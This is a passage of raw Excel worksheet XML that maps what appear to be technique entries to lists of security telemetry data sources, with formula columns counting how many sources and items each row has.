      <c r="E103" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F103" s="13"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="53" t="s">
        <v>993</v>
      </c>
      <c r="B104" s="13" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C104" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D104" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E104" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F104" s="13"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="53" t="s">
        <v>999</v>
      </c>
      <c r="B105" s="13" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C105" s="17" t="s">
        <v>204</v>
      </c>
      <c r="D105" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E105" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F105" s="13"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="53" t="s">
        <v>1004</v>
      </c>
      <c r="B106" s="13" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,DLL monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C106" s="17" t="s">
        <v>206</v>
      </c>
      <c r="D106" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E106" s="13">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F106" s="13"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="53" t="s">
        <v>1009</v>
      </c>
      <c r="B107" s="13" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
      <c r="C107" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D107" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E107" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F107" s="13"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="53" t="s">
        <v>141</v>
      </c>
      <c r="B108" s="13" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C108" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D108" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E108" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F108" s="13"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="55" t="s">
        <v>142</v>
      </c>
      <c r="B109" s="13" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C109" s="17">
        <v>100</v>
      </c>
      <c r="D109" s="13">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E109" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F109" s="13"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="53" t="s">
        <v>145</v>
      </c>
      <c r="B110" s="13" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D110" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E110" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F110" s="13"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="55" t="s">
        <v>151</v>
      </c>
      <c r="B111" s="13" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C111" s="17">
        <v>100</v>
      </c>
      <c r="D111" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E111" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="13"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="53" t="s">
        <v>153</v>
      </c>
      <c r="B112" s="13" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C112" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D112" s="13">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E112" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F112" s="13"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="53" t="s">
        <v>1037</v>
      </c>
      <c r="B113" s="13" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C113" s="17" t="s">
        <v>217</v>
      </c>
      <c r="D113" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E113" s="13">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F113" s="13"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="53" t="s">
        <v>1040</v>
      </c>
      <c r="B114" s="13" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D114" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="13"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="53" t="s">
        <v>1043</v>
      </c>
      <c r="B115" s="13" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C115" s="17" t="s">
        <v>221</v>
      </c>
      <c r="D115" s="13">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E115" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F115" s="13"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="55" t="s">
        <v>154</v>
      </c>
      <c r="B116" s="13" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C116" s="17">
        <v>100</v>
      </c>
      <c r="D116" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E116" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="13"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="55" t="s">
        <v>1054</v>
      </c>
      <c r="B117" s="13" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E117" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="13"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="53" t="s">
        <v>1060</v>
      </c>
      <c r="B118" s="13" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C118" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D118" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E118" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F118" s="13"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="53" t="s">
        <v>1065</v>
      </c>
      <c r="B119" s="13" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,File monitoring,Authentication logs</v>
      </c>
      <c r="C119" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D119" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E119" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F119" s="13"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="53" t="s">
        <v>1071</v>
      </c>
      <c r="B120" s="13" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C120" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D120" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F120" s="13"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="55" t="s">
        <v>1076</v>
      </c>
      <c r="B121" s="13" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="13">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E121" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="13"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="53" t="s">
        <v>1081</v>
      </c>
      <c r="B122" s="13" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C122" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D122" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E122" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F122" s="13"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="53" t="s">
        <v>155</v>
      </c>
      <c r="B123" s="13" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C123" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D123" s="13">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E123" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F123" s="13"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="53" t="s">
        <v>1089</v>
      </c>
      <c r="B124" s="13" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C124" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D124" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E124" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F124" s="13"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="53" t="s">
        <v>1094</v>
      </c>
      <c r="B125" s="13" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C125" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D125" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E125" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F125" s="13"/>
      <c r="G125" s="19"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="53" t="s">
        <v>1098</v>
      </c>
      <c r="B126" s="13" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C126" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D126" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E126" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F126" s="13"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="53" t="s">
        <v>1101</v>
      </c>
      <c r="B127" s="13" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,DNS records,Process monitoring,Process use of network,Packet capture</v>
      </c>
      <c r="C127" s="17" t="s">
        <v>235</v>
      </c>
      <c r="D127" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E127" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F127" s="13"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="55" t="s">
        <v>157</v>
      </c>
      <c r="B128" s="13" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="13">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E128" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="13"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="53" t="s">
        <v>160</v>
      </c>
      <c r="B129" s="13" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C129" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D129" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E129" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="13"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="53" t="s">
        <v>1114</v>
      </c>
      <c r="B130" s="13" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>239</v>
      </c>
      <c r="D130" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E130" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F130" s="13"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="53" t="s">
        <v>1117</v>
      </c>
      <c r="B131" s="13" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C131" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D131" s="13">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E131" s="13">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F131" s="13"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="53" t="s">
        <v>165</v>
      </c>
      <c r="B132" s="13" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C132" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D132" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E132" s="13">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F132" s="13"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="53" t="s">
        <v>1127</v>
      </c>
      <c r="B133" s="13" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C133" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D133" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F133" s="13"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="55" t="s">
        <v>1132</v>
      </c>
      <c r="B134" s="13" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process monitoring</v>
      </c>
      <c r="C134" s="17">
        <v>100</v>
      </c>
      <c r="D134" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E134" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="13"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="55" t="s">
        <v>1137</v>
      </c>
      <c r="B135" s="13" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C135" s="17">
        <v>100</v>
      </c>
      <c r="D135" s="13">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E135" s="13">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F135" s="13"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="53" t="s">
        <v>1142</v>
      </c>
      <c r="B136" s="13" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
      <c r="C136" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D136" s="13">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F136" s="13"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="53" t="s">
        <v>169</v>
      </c>
      <c r="B137" s="13" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C137" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D137" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E137" s="13">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F137" s="13"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="53" t="s">
        <v>171</v>
      </c>
      <c r="B138" s="13" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C138" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D138" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E138" s="13">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F138" s="13"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="53" t="s">
        <v>172</v>
      </c>
      <c r="B139" s="13" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D139" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E139" s="13">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F139" s="13"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="53" t="s">
        <v>178</v>
      </c>
      <c r="B140" s="13" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C140" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D140" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E140" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F140" s="13"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="53" t="s">
        <v>1161</v>
      </c>
      <c r="B141" s="13" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D141" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="13"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="53" t="s">
        <v>1164</v>
      </c>
      <c r="B142" s="13" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C142" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D142" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E142" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F142" s="13"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="53" t="s">
        <v>1168</v>
      </c>
      <c r="B143" s="13" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D143" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E143" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F143" s="13"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="55" t="s">
        <v>1173</v>
      </c>
      <c r="B144" s="13" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C144" s="17">
        <v>100</v>
      </c>
      <c r="D144" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E144" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="13"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="55" t="s">
        <v>183</v>
      </c>
      <c r="B145" s="13" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C145" s="17">
        <v>0</v>
      </c>
      <c r="D145" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E145" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F145" s="13"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="55" t="s">
        <v>1183</v>
      </c>
      <c r="B146" s="13" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C146" s="17">
        <v>100</v>
      </c>
      <c r="D146" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E146" s="13">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="13"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="53" t="s">
        <v>1188</v>
      </c>
      <c r="B147" s="13" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D147" s="13">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E147" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="13"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="53" t="s">
        <v>1192</v>
      </c>
      <c r="B148" s="13" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C148" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D148" s="13">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E148" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F148" s="13"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="53" t="s">
        <v>1197</v>
      </c>
      <c r="B149" s="13" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Packet capture</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D149" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E149" s="13">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F149" s="13"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="53" t="s">
        <v>185</v>
      </c>
      <c r="B150" s="13" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D150" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E150" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="13"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="53" t="s">
        <v>186</v>
      </c>
      <c r="B151" s="13" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D151" s="13">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E151" s="13">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="13"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="53" t="s">
        <v>190</v>
      </c>
      <c r="B152" s="13" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C152" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D152" s="13">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E152" s="13">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F152" s="13"/>
